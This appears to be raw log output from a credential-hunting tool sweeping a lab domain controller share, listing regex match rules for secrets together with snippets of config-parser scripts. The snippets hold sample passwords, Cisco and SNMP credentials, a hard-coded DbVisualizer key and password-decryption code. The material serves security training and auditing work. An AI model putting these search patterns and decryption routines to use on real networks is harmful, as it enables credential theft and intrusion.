url="jdbc:mysql://localhost:3306/mydb"/>\r\n</Context>\r\n\r\n\#> [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:14Z [File] {Red}<KeepPassOrKeyInCode|R|passw?o?r?d\s*=\s*[\'\"][^\'\"]....|12kB|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\ConfigParsers\parser-app.config.ps1) web>\r\n\ \ \ \ <compilation\ debug="true"\ />\r\n\ \ \ \ <authentication\ mode="Forms">\r\n\ \ \ \ \ \ <forms\ loginUrl="login\.aspx"\ timeout="30">\r\n\ \ \ \ \ \ \ \ <credentials\ passwordFormat="Clear">\r\n\ \ \ \ \ \ \ \ \ \ <user\ name="user1"\ password="password1"\ />\r\n\ \ \ \ \ \ \ \ \ \ <user\ name="user2"\ password="password2"\ />\r\n\ \ \ \ \ \ \ \ </credentials>\r\n\ \ \ \ \ \ </forms>\r\n\ \ \ \ </authentication>\r\n\ \ \ \ <customErrors\ mode="Off"\ />\r\n\ \ </system\.web>\r\n\r\n\ \ <!-- [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:14Z [File] {Green}<KeepNameContainsGreen|R|credential|2.3kB|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\ConfigParsers\parser-gitcredentials.ps1) parser-gitcredentials.ps1 [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:14Z [File] {Red}<KeepCmdCredentials|R|passwo?r?d\s*=\s*[\'\"][^\'\"]....|2.3kB|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\ConfigParsers\parser-gitcredentials.ps1) \ \ \ \ \ \ \ \ \ TargetPort\ \ \ =\ "NA"\ \ \ \ \ \ \ \ \ \ \#\ Not\ in\ \.git-credentials\ format\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ Database\ \ \ \ \ =\ "NA"\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ Domain\ \ \ \ \ \ \ =\ "NA"\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ Username\ \ \ \ \ =\ \$username\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ Password\ \ \ \ \ =\ "NA"\ \ \ \ \ \ \ \ \ \ \#\ Decrypted\ password\ not\ available\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ PasswordEnc\ \ =\ \$passwordEnc\ \ \#\ Original\ token/password\ as\ in\ file\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ KeyFilePath\ \ =\ "NA"\n\ \ \ \ \ \ \ \ \ \ \ \ }\n\ \ \ \ [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:14Z [File] {Yellow}<KeepDbConnStringPw|R|connectionstring.{1,200}passw|12kB|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\ConfigParsers\parser-app.config.ps1) key\ "UserName"\ -value\ \$value\ }\r\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ "Password"\ \{\ Add-CredentialPair\ -name\ "CustomService"\ -section\ \$section\ -key\ "Password"\ -value\ \$value\ }\r\n\ \ \ \ \ \ \ \ \ \ \ \ }\r\n\ \ \ \ \ \ \ \ }\r\n\ \ \ \ }\r\n\r\n\ \ \ \ \#\ Parse\ connectionStrings\ for\ server,\ port,\ username,\ and\ password\r\n\ \ \ \ if\ \(\$configXml\.configuration\.connectionStrings\)\ \{\r\n\ \ \ \ \ \ \ \ foreach\ \(\$connection\ in\ \$configXml\.configuration\.connectionStrings\.add\)\ \{\r\n\ \ [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:14Z [File] {Green}<KeepNameContainsGreen|R|passw|1.2kB|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\ConfigParsers\parser-htpasswd.ps1) parser-htpasswd.ps1 [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:14Z [File] {Red}<KeepPassOrKeyInCode|R|passw?o?r?d\s*=\s*[\'\"][^\'\"]....|2.3kB|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\ConfigParsers\parser-gitcredentials.ps1) \ \ \ \ \ \ \ \ \ TargetPort\ \ \ =\ "NA"\ \ \ \ \ \ \ \ \ \ \#\ Not\ in\ \.git-credentials\ format\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ Database\ \ \ \ \ =\ "NA"\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ Domain\ \ \ \ \ \ \ =\ "NA"\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ Username\ \ \ \ \ =\ \$username\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ Password\ \ \ \ \ =\ "NA"\ \ \ \ \ \ \ \ \ \ \#\ Decrypted\ password\ not\ available\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ PasswordEnc\ \ =\ \$passwordEnc\ \ \#\ Original\ token/password\ as\ in\ file\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ KeyFilePath\ \ =\ "NA"\n\ \ \ \ \ \ \ \ \ \ \ \ }\n\ \ \ \ [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:14Z [File] {Red}<KeepCmdCredentials|R|passwo?r?d\s*=\s*[\'\"][^\'\"]....|11.2kB|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\ConfigParsers\parser-cisco-config.ps1) \ \ }\n\n\ \ \ \ \ \ \ \ return\ \$decodedPassword\n\ \ \ \ }\n\n\ \ \ \ \#\ Read\ the\ file\ content\n\ \ \ \ \$fileContent\ =\ Get-Content\ -Path\ \$FilePath\n\n\ \ \ \ \#\ Regex\ patterns\ for\ different\ password\ types\ and\ usernames\n\ \ \ \ \$regexEnablePassword\ =\ '\(\?<=enable\ password\\s\)\(\\d\*\)\\s\*\(\[\^\\s]\+\)'\ \ \ \ \ \ \ \ \#\ Matches\ enable\ password\ \(cleartext\ or\ encoded\)\n\ \ \ \ \$regexEnableSecret\ =\ '\(\?<=enable\ secret\\s5\\s\)\(\[\^\\s]\+\)'\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \#\ Matches\ enable\ [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:14Z [File] {Red}<KeepCmdCredentials|R|passwo?r?d\s*=\s*[\'\"][^\'\"]....|15.5kB|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\ConfigParsers\parser-machine.config.ps1) ="Forms">\r\n\ \ \ \ \ \ <!--\ Forms\ authentication\ with\ username\ and\ password\ -->\r\n\ \ \ \ \ \ <forms\ loginUrl="login\.aspx"\ timeout="30">\r\n\ \ \ \ \ \ \ \ <credentials\ passwordFormat="Clear">\r\n\ \ \ \ \ \ \ \ \ \ <user\ name="user1"\ password="password1"\ />\r\n\ \ \ \ \ \ \ \ \ \ <user\ name="user2"\ password="password2"\ />\r\n\ \ \ \ \ \ \ \ </credentials>\r\n\ \ \ \ \ \ </forms>\r\n\ \ \ \ </authentication>\r\n\ \ \ \ <customErrors\ mode="Off"\ />\r\n\ \ </system\.web>\r\n\r\n\ \ <!-- [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:14Z [File] {Red}<KeepCmdCredentials|R|passwo?r?d\s*=\s*[\'\"][^\'\"]....|2.3kB|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\ConfigParsers\parser-example.rdp.ps1) nprotect\(\$passwordBytes,\ \$null,\ \[System\.Security\.Cryptography\.DataProtectionScope]::CurrentUser\)\)\r\n\ \ \ \ \ \ \ \ }\ catch\ \{\r\n\ \ \ \ \ \ \ \ \ \ \ \ Write-Warning\ "Unable\ to\ decrypt\ password:\ \$_"\r\n\ \ \ \ \ \ \ \ \ \ \ \ \$decryptedPassword\ =\ "Unable\ to\ decrypt"\r\n\ \ \ \ \ \ \ \ }\r\n\ \ \ \ }\ else\ \{\r\n\ \ \ \ \ \ \ \ \$encryptedPassword\ =\ "No\ password\ found"\r\n\ \ \ \ \ \ \ \ \$decryptedPassword\ =\ "No\ password\ found"\r\n\ \ \ \ }\r\n\r\n\ \ \ \ \#\ Create\ a\ PowerShell\ object\ t [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:14Z [File] {Red}<KeepCmdCredentials|R|passwo?r?d\s*=\s*[\'\"][^\'\"]....|5.1kB|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\ConfigParsers\parser-dbvisxml.ps1) string]\$UncFilePath\ \ =\ \$null,\ \ \ \#\ Optional\n\ \ \ \ \ \ \ \ \[string]\$FileName\ \ \ \ \ =\ \$null,\ \ \ \#\ Optional\n\ \ \ \ \ \ \ \ \[string]\$FilePath\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \#\ Required\n\ \ \ \ \)\n\n\ \ \ \ \#\ Parameters\ for\ password\ decryption\n\ \ \ \ \$password\ =\ "qinda"\ \ \#\ hard-coded\ key\n\ \ \ \ \$iterations\ =\ 10\n\ \ \ \ \$salt\ =\ \[byte\[]]@\(142,\ 18,\ 57,\ 156,\ 7,\ 114,\ 111,\ 90\)\n\n\ \ \ \ \#\ Create\ the\ key\ and\ cipher\ for\ PBEWithMD5AndDES\n\ \ \ \ \$spec\ =\ New-Object\ System\.S [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:14Z [File] {Red}<KeepCmdCredentials|R|passwo?r?d\s*=\s*[\'\"][^\'\"]....|25.3kB|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\ConfigParsers\parser-gppfiles.ps1) rObject\.TransformFinalBlock\(\$InputBytes,\ 0,\ \$InputBytes\.Length\)\r\n\ \ \ \ \ \ \ \ \$EncryptedCpassword\ =\ \[Convert]::ToBase64String\(\$EncryptedBytes\)\r\n\r\n\ \ \ \ \ \ \ \ return\ \$EncryptedCpassword\r\n\ \ \ \ }\r\n\r\n\ \ \ \ \$plainTextPassword\ =\ "MyAwesomePassword!"\r\n\ \ \ \ \$encryptedPassword\ =\ Set-EncryptedCpassword\ -Password\ \$plainTextPassword\r\n\ \ \ \ Write-Output\ \$encryptedPassword\r\n\r\n\#>\r\n\r\n<\#\ Printers\.xml\r\n\r\n<\?xml\ version="1\.0"\ encod [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:14Z [File] {Red}<KeepPassOrKeyInCode|R|passw?o?r?d?>\s*[^\s<]+\s*<|2.4kB|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\ConfigParsers\parser-jboss-cli.xml.ps1) \ default\ is\ 9990\ -->\r\n\ \ \ \ </controller>\r\n\r\n\ \ \ \ <!--\ The\ authentication\ details\ for\ the\ controller\ -->\r\n\ \ \ \ <authentication>\r\n\ \ \ \ \ \ \ \ <username>admin</username>\ <!--\ Your\ management\ user\ -->\r\n\ \ \ \ \ \ \ \ <password>password</password>\ <!--\ Your\ management\ user's\ password\ -->\r\n\ \ \ \ </authentication>\r\n\r\n\ \ \ \ <!--\ Optionally\ enable\ secure\ connections\ using\ SSL\ -->\r\n\ \ \ \ <ssl>\r\n\ \ \ \ \ \ \ \ <enabled>false</enabled> [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:14Z [File] {Green}<KeepNameContainsGreen|R|passw|1.7kB|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\ConfigParsers\parser-pureftpd.passwd.ps1) parser-pureftpd.passwd.ps1 [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:14Z [File] {Red}<KeepCmdCredentials|R|passwo?r?d\s*=\s*[\'\"][^\'\"]....|2.3kB|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\ConfigParsers\parser-php.ini.ps1) Storing\ database\ credentials\ in\ php\.ini\ \(not\ recommended\)\r\n;\ This\ exposes\ credentials\ to\ anyone\ with\ access\ to\ php\.ini\ or\ via\ phpinfo\(\)\ if\ not\ secured\.\r\n\r\nmysql\.default_user\ =\ "dbuser"\r\nmysql\.default_password\ =\ "P@ssw0rd123"\r\nmysql\.default_host\ =\ "localhost"\r\nmysql\.default_database\ =\ "example_db"\r\n\r\n;\ Log\ errors\ to\ a\ file\r\nlog_errors\ =\ On\r\nerror_log\ =\ /var/log/php_errors\.log\r\n\r\n;\ Ensure\ that\ this\ [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:14Z [File] {Red}<KeepPassOrKeyInCode|R|passw?o?r?d\s*=\s*[\'\"][^\'\"]....|2.3kB|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\ConfigParsers\parser-php.ini.ps1) Storing\ database\ credentials\ in\ php\.ini\ \(not\ recommended\)\r\n;\ This\ exposes\ credentials\ to\ anyone\ with\ access\ to\ php\.ini\ or\ via\ phpinfo\(\)\ if\ not\ secured\.\r\n\r\nmysql\.default_user\ =\ "dbuser"\r\nmysql\.default_password\ =\ "P@ssw0rd123"\r\nmysql\.default_host\ =\ "localhost"\r\nmysql\.default_database\ =\ "example_db"\r\n\r\n;\ Log\ errors\ to\ a\ file\r\nlog_errors\ =\ On\r\nerror_log\ =\ /var/log/php_errors\.log\r\n\r\n;\ Ensure\ that\ this\ [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:14Z [File] {Red}<KeepPassOrKeyInCode|R|passw?o?r?d\s*=\s*[\'\"][^\'\"]....|11.2kB|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\ConfigParsers\parser-cisco-config.ps1) \ \ }\n\n\ \ \ \ \ \ \ \ return\ \$decodedPassword\n\ \ \ \ }\n\n\ \ \ \ \#\ Read\ the\ file\ content\n\ \ \ \ \$fileContent\ =\ Get-Content\ -Path\ \$FilePath\n\n\ \ \ \ \#\ Regex\ patterns\ for\ different\ password\ types\ and\ usernames\n\ \ \ \ \$regexEnablePassword\ =\ '\(\?<=enable\ password\\s\)\(\\d\*\)\\s\*\(\[\^\\s]\+\)'\ \ \ \ \ \ \ \ \#\ Matches\ enable\ password\ \(cleartext\ or\ encoded\)\n\ \ \ \ \$regexEnableSecret\ =\ '\(\?<=enable\ secret\\s5\\s\)\(\[\^\\s]\+\)'\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \#\ Matches\ enable\ [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:14Z [File] {Red}<KeepPassOrKeyInCode|R|passw?o?r?d\s*=\s*[\'\"][^\'\"]....|15.5kB|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\ConfigParsers\parser-machine.config.ps1) ="Forms">\r\n\ \ \ \ \ \ <!--\ Forms\ authentication\ with\ username\ and\ password\ -->\r\n\ \ \ \ \ \ <forms\ loginUrl="login\.aspx"\ timeout="30">\r\n\ \ \ \ \ \ \ \ <credentials\ passwordFormat="Clear">\r\n\ \ \ \ \ \ \ \ \ \ <user\ name="user1"\ password="password1"\ />\r\n\ \ \ \ \ \ \ \ \ \ <user\ name="user2"\ password="password2"\ />\r\n\ \ \ \ \ \ \ \ </credentials>\r\n\ \ \ \ \ \ </forms>\r\n\ \ \ \ </authentication>\r\n\ \ \ \ <customErrors\ mode="Off"\ />\r\n\ \ </system\.web>\r\n\r\n\ \ <!-- [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:14Z [File] {Red}<KeepPassOrKeyInCode|R|passw?o?r?d\s*=\s*[\'\"][^\'\"]....|2.3kB|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\ConfigParsers\parser-example.rdp.ps1) nprotect\(\$passwordBytes,\ \$null,\ \[System\.Security\.Cryptography\.DataProtectionScope]::CurrentUser\)\)\r\n\ \ \ \ \ \ \ \ }\ catch\ \{\r\n\ \ \ \ \ \ \ \ \ \ \ \ Write-Warning\ "Unable\ to\ decrypt\ password:\ \$_"\r\n\ \ \ \ \ \ \ \ \ \ \ \ \$decryptedPassword\ =\ "Unable\ to\ decrypt"\r\n\ \ \ \ \ \ \ \ }\r\n\ \ \ \ }\ else\ \{\r\n\ \ \ \ \ \ \ \ \$encryptedPassword\ =\ "No\ password\ found"\r\n\ \ \ \ \ \ \ \ \$decryptedPassword\ =\ "No\ password\ found"\r\n\ \ \ \ }\r\n\r\n\ \ \ \ \#\ Create\ a\ PowerShell\ object\ t [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:14Z [File] {Red}<KeepCmdCredentials|R|passwo?r?d\s*=\s*[\'\"][^\'\"]....|6.5kB|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\ConfigParsers\parser-server.xml.ps1) estConnector-2\.0</feature>\r\n\ \ \ \ <feature>jdbc-4\.2</feature>\r\n\ \ \ \ <feature>mpOpenApi-1\.0</feature>\r\n\ \ </featureManager>\r\n\r\n\ \ <variable\ name="onError"\ value="FAIL"/>\r\n\r\n\ \ <keyStore\ id="defaultKeyStore"\ password="Liberty"/>\r\n\ \ \r\n\ \ <basicRegistry>\r\n\ \ \ \ <user\ name="adminuser"\ password="adminpwd"\ />\r\n\ \ \ \ <user\ name="reader"\ password="readerpwd"\ />\r\n\ \ \ \ <user\ name="user"\ password="userpwd"\ />\r\n\ \ </basicR [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:14Z [File] {Red}<KeepPassOrKeyInCode|R|passw?o?r?d\s*=\s*[\'\"][^\'\"]....|5.1kB|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\ConfigParsers\parser-dbvisxml.ps1) string]\$UncFilePath\ \ =\ \$null,\ \ \ \#\ Optional\n\ \ \ \ \ \ \ \ \[string]\$FileName\ \ \ \ \ =\ \$null,\ \ \ \#\ Optional\n\ \ \ \ \ \ \ \ \[string]\$FilePath\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \#\ Required\n\ \ \ \ \)\n\n\ \ \ \ \#\ Parameters\ for\ password\ decryption\n\ \ \ \ \$password\ =\ "qinda"\ \ \#\ hard-coded\ key\n\ \ \ \ \$iterations\ =\ 10\n\ \ \ \ \$salt\ =\ \[byte\[]]@\(142,\ 18,\ 57,\ 156,\ 7,\ 114,\ 111,\ 90\)\n\n\ \ \ \ \#\ Create\ the\ key\ and\ cipher\ for\ PBEWithMD5AndDES\n\ \ \ \ \$spec\ =\ New-Object\ System\.S [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:14Z [File] {Red}<KeepPassOrKeyInCode|R|passw?o?r?d\s*=\s*[\'\"][^\'\"]....|25.3kB|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\ConfigParsers\parser-gppfiles.ps1) rObject\.TransformFinalBlock\(\$InputBytes,\ 0,\ \$InputBytes\.Length\)\r\n\ \ \ \ \ \ \ \ \$EncryptedCpassword\ =\ \[Convert]::ToBase64String\(\$EncryptedBytes\)\r\n\r\n\ \ \ \ \ \ \ \ return\ \$EncryptedCpassword\r\n\ \ \ \ }\r\n\r\n\ \ \ \ \$plainTextPassword\ =\ "MyAwesomePassword!"\r\n\ \ \ \ \$encryptedPassword\ =\ Set-EncryptedCpassword\ -Password\ \$plainTextPassword\r\n\ \ \ \ Write-Output\ \$encryptedPassword\r\n\r\n\#>\r\n\r\n<\#\ Printers\.xml\r\n\r\n<\?xml\ version="1\.0"\ encod [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:14Z [File] {Red}<KeepPassOrKeyInCode|R|passw?o?r?d\s*=\s*[\'\"][^\'\"]....|6.5kB|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\ConfigParsers\parser-server.xml.ps1) estConnector-2\.0</feature>\r\n\ \ \ \ <feature>jdbc-4\.2</feature>\r\n\ \ \ \ <feature>mpOpenApi-1\.0</feature>\r\n\ \ </featureManager>\r\n\r\n\ \ <variable\ name="onError"\ value="FAIL"/>\r\n\r\n\ \ <keyStore\ id="defaultKeyStore"\ password="Liberty"/>\r\n\ \ \r\n\ \ <basicRegistry>\r\n\ \ \ \ <user\ name="adminuser"\ password="adminpwd"\ />\r\n\ \ \ \ <user\ name="reader"\ password="readerpwd"\ />\r\n\ \ \ \ <user\ name="user"\ password="userpwd"\ />\r\n\ \ </basicR [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:14Z [File] {Red}<KeepPassOrKeyInCode|R|passw?o?r?d?>\s*[^\s<]+\s*<|3.6kB|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\ConfigParsers\parser-standalone.xml-ps1.ps1) alhost:3306/mydatabase</connection-url>\r\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ <driver>mysql</driver>\r\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ <security>\r\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ <user-name>\$\{VAULT::vault::mydbuser}</user-name>\r\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ <password>\$\{VAULT::vault::mydbpassword}</password>\r\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ </security>\r\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ <pool>\r\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ <min-pool-size>5</min-pool-size>\r\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ <max-pool-size>20</max [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:14Z [File] {Yellow}<KeepDbConnStringPw|R|connectionstring.{1,200}passw|15.5kB|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\ConfigParsers\parser-machine.config.ps1) key\ "UserName"\ -value\ \$value\ }\r\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ "Password"\ \{\ Add-CredentialPair\ -name\ "CustomService"\ -section\ \$section\ -key\ "Password"\ -value\ \$value\ }\r\n\ \ \ \ \ \ \ \ \ \ \ \ }\r\n\ \ \ \ \ \ \ \ }\r\n\ \ \ \ }\r\n\r\n\ \ \ \ \#\ Parse\ connectionStrings\ for\ server,\ port,\ username,\ and\ password\r\n\ \ \ \ if\ \(\$configXml\.configuration\.connectionStrings\)\ \{\r\n\ \ \ \ \ \ \ \ foreach\ \(\$connection\ in\ \$configXml\.configuration\.connectionStrings\.add\)\ \{\r\n\ \ [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:14Z [File] {Red}<KeepCmdCredentials|R|passwo?r?d\s*=\s*[\'\"][^\'\"]....|3.6kB|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\ConfigParsers\parser-SiteManager.xml.ps1) ML\ file\r\n\ \ \ \ \$xml\ =\ \[xml]\(Get-Content\ \$xmlFilePath\)\r\n\r\n\ \ \ \ \#\ Iterate\ through\ each\ server\ entry\ and\ extract\ relevant\ information\r\n\ \ \ \ \$xml\.FileZilla3\.Servers\.Server\ \|\ ForEach-Object\ \{\r\n\ \ \ \ \ \ \ \ \$decodedPassword\ =\ "Invalid\ or\ not\ present"\r\n\r\n\ \ \ \ \ \ \ \ \#\ Access\ the\ Pass\ element's\ inner\ text,\ ensuring\ it's\ properly\ treated\ as\ a\ string\r\n\ \ \ \ \ \ \ \ \[string]\$base64Pass\ =\ \$_\.Pass\.InnerText\r\n\ \ \ \ \ \ \ \ \#\ Check\ if\ t [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:14Z [File] {Red}<KeepNetConfigCreds|R|snmp-server community\s.+\sRW|11.2kB|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\ConfigParsers\parser-cisco-config.ps1) auto\n!\ninterface\ GigabitEthernet0/1\n\ description\ Internal\ LAN\n\ ip\ address\ 192\.168\.2\.1\ 255\.255\.255\.0\n\ duplex\ auto\n\ speed\ auto\n!\nip\ route\ 0\.0\.0\.0\ 0\.0\.0\.0\ 192\.168\.1\.254\n!\nsnmp-server\ community\ public\ RO\nsnmp-server\ community\ private\ RW\n!\nline\ con\ 0\n\ exec-timeout\ 0\ 0\n\ password\ consolepassword123\n\ logging\ synchronous\n\ login\n!\nline\ vty\ 0\ 4\n\ password\ 7\ 02050D4808091B385C4B5E1A09121319\n\ logging\ synchronou [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:14Z [File] {Red}<KeepCmdCredentials|R|passwo?r?d\s*=\s*[\'\"][^\'\"]....|2.6kB|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\ConfigParsers\parser-tomcat-users.xml.ps1) \r\n\ \ <role\ rolename="admin-script"/>\r\n\ \ <role\ rolename="manager-gui"/>\r\n\ \ <role\ rolename="manager-status"/>\r\n\ \ <role\ rolename="manager-script"/>\r\n\ \ <role\ rolename="manager-jmx"/>\r\n\ \ <user\ name="admin"\ password="admin"\ roles="admin-gui,admin-script,manager-gui,manager-status,manager-script,manager-jmx"/>\r\n</tomcat-users>\r\n\r\n\#> [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:14Z [File] {Red}<KeepCmdCredentials|R|passwo?r?d\s*=\s*[\'\"][^\'\"]....|13.2kB|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\ConfigParsers\parser-web.config.ps1) tication\ settings\ for\ web\ applications\ -->\n\ \ \ \ <authentication\ mode="Forms">\n\ \ \ \ \ \ <forms\ loginUrl="login\.aspx"\ timeout="30">\n\ \ \ \ \ \ \ \ <credentials\ passwordFormat="Clear">\n\ \ \ \ \ \ \ \ \ \ <user\ name="user1"\ password="password1"\ />\n\ \ \ \ \ \ \ \ \ \ <user\ name="user2"\ password="password2"\ />\n\ \ \ \ \ \ \ \ </credentials>\n\ \ \ \ \ \ </forms>\n\ \ \ \ </authentication>\n\n\ \ \ \ <!--\ Authorization\ settings\ to\ allow\ or\ deny\ user\ access\ - [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:14Z [File] {Red}<KeepCmdCredentials|R|passwo?r?d\s*=\s*[\'\"][^\'\"]....|2.8kB|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\ConfigParsers\parser-winscp.ini.ps1) encoded\)\r\n\ \ \ \ \$decryptedPassword\ =\ \[System\.Text\.Encoding]::UTF8\.GetString\(\$decryptedBytes\)\r\n\r\n\ \ \ \ return\ \$decryptedPassword\r\n}\r\n\r\n\#\ Example\ usage\ with\ an\ encrypted\ password\ from\ WinSCP\.ini\r\n\$encryptedPassword\ =\ "Base64EncryptedPasswordHere"\r\n\$decryptedPassword\ =\ ConvertFrom-DPAPI\ -EncryptedPassword\ \$encryptedPassword\r\nWrite-Output\ "Decrypted\ Password:\ \$decryptedPassword"\r\n\r\n\r\n\#>\r\n\r\n\r\n<\#\ winscp\.ini [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:14Z [File] {Red}<KeepPassOrKeyInCode|R|passw?o?r?d\s*=\s*[\'\"][^\'\"]....|3.6kB|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\ConfigParsers\parser-SiteManager.xml.ps1) ML\ file\r\n\ \ \ \ \$xml\ =\ \[xml]\(Get-Content\ \$xmlFilePath\)\r\n\r\n\ \ \ \ \#\ Iterate\ through\ each\ server\ entry\ and\ extract\ relevant\ information\r\n\ \ \ \ \$xml\.FileZilla3\.Servers\.Server\ \|\ ForEach-Object\ \{\r\n\ \ \ \ \ \ \ \ \$decodedPassword\ =\ "Invalid\ or\ not\ present"\r\n\r\n\ \ \ \ \ \ \ \ \#\ Access\ the\ Pass\ element's\ inner\ text,\ ensuring\ it's\ properly\ treated\ as\ a\ string\r\n\ \ \ \ \ \ \ \ \[string]\$base64Pass\ =\ \$_\.Pass\.InnerText\r\n\ \ \ \ \ \ \ \ \#\ Check\ if\ t [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:14Z [File] {Red}<KeepGitCredsByName|R|^\.git-credentials$|215B|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\SampleConfigs\.git-credentials) .git-credentials [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:14Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|5.3kB|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\ConfigParsers\parser-unattend.xml.ps1) \ =\ \$autoLogon\.AutoLogon\.Password\.Value\r\n\ \ \ \ \ \ \ \ \$isPlainText\ =\ \$autoLogon\.AutoLogon\.Password\.PlainText\ -eq\ "true"\r\n\r\n\ \ \ \ \ \ \ \ \#\ Decode\ password\ if\ necessary\r\n\ \ \ \ \ \ \ \ \$password\ =\ Decode-PasswordIfNeeded\ -passwordValue\ \$password\ -isPlainText\ \$isPlainText\r\n\r\n\ \ \ 